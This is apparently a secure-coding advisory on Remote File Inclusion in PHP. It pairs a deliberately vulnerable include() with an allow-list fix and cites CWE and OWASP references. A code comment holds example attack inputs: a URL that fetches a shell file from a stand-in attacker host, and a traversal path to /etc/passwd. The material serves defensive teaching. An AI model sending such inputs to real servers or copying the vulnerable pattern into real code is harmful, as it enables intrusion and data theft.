Description
Remote File Inclusion (RFI) is a vulnerability in which an application's dynamic file inclusion mechanism (for example an include or require call that accepts URLs as well as local paths) is given a path built from user-supplied input without proper validation. An attacker who supplies the URL of a file they control typically gains arbitrary code execution on the server, because the fetched content is interpreted as code. Even where the included content is not executed, the server is still made to fetch an attacker-chosen resource, which is a Server-Side Request Forgery (SSRF) issue in its own right.
Recommendation
To mitigate RFI vulnerabilities, avoid passing user-submitted input to filesystem or framework file-loading APIs at all. If that is unavoidable, maintain an allow list of the files that may be included and have the request carry only an opaque identifier (a key into that list) that the application maps to the selected file, so the user-controlled value never becomes part of a path or URL. Reject any request whose identifier is not in the list; this eliminates the attack surface instead of trying to filter dangerous input after the fact.
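The following PHP front controller is an added illustration of the recommendation above, not code from the original page or from any particular project. It shows the vulnerable pattern next to the allow-list fix; the pages/ directory, the page names and the request parameter name are assumed for the example.

```php
<?php
// Added example, not from the original page. Assumes a front controller that
// selects a page template via the "page" query parameter; the pages/ directory
// and the page names below are hypothetical.

// Vulnerable form: the raw parameter reaches include(). With allow_url_include
// enabled, ?page=http://attacker.example/shell.txt makes the server fetch and
// execute attacker-controlled code; with URL wrappers disabled the same sink is
// still a local file inclusion / path traversal bug (?page=../../etc/passwd).
function render_page_vulnerable(string $page): void
{
    include $page;
}

// Hardened form: the request carries only an identifier, which is looked up in
// a fixed allow list. The user never controls a path or URL, and unknown
// identifiers are rejected before any filesystem API is touched.
const PAGE_ALLOW_LIST = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the allowed path for an identifier, or null if it is not in the list.
// Exact key match only: no normalisation, no prefix or extension checks, and no
// concatenation of user input into the path.
function resolve_page(string $id): ?string
{
    return PAGE_ALLOW_LIST[$id] ?? null;
}

function render_page_safe(string $id): void
{
    $path = resolve_page($id);
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}

// Entry point: reject missing or non-string parameters (PHP turns page[]=x
// into an array) before the lookup.
$id = $_GET['page'] ?? '';
if (!is_string($id)) {
    http_response_code(400);
    exit('Bad request');
}
render_page_safe($id);
```

The identifier is used only as an array key, so characters such as `/`, `..` or `://` in the request simply fail the lookup. As defense in depth, keep `allow_url_include=Off` in php.ini (the default since PHP 5.2); that setting removes the remote part of RFI for the whole runtime but does nothing against the local inclusion variant, which is why the allow list is still required.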
References
- OWASP: Testing for Remote File Inclusion
- Wikipedia: File inclusion vulnerability
- CWE-20
- CWE-918
- CWE-98
- CAPEC-193
- OWASP 2021-A10
- OWASP 2021-A3